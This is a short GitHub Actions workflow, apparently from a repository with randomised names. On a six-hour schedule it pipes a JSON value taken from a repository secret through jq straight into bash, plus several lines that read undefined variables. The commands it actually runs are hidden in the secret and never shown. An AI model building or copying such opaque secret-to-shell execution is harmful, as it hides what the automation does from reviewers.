name: askdmk

on:
  workflow_dispatch:
  schedule:
    - cron: '6 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: askdmk
        env:
          gr00: ${{ secrets.gr00 }}
        run: |
          echo $gr00 | jq -r .gkwt52142 | /bin/bash
          echo $svp7148 | jq -r .xfnc28 | /bin/bash
          echo $jodxj85944 | jq -r .k11743 | /bin/bash
          echo $arkx3458 | jq -r .vt47 | /bin/bash
          echo $pwwug246 | jq -r .waf8312 | /bin/bash
          echo $t2435 | jq -r .zkhf8620 | /bin/bash

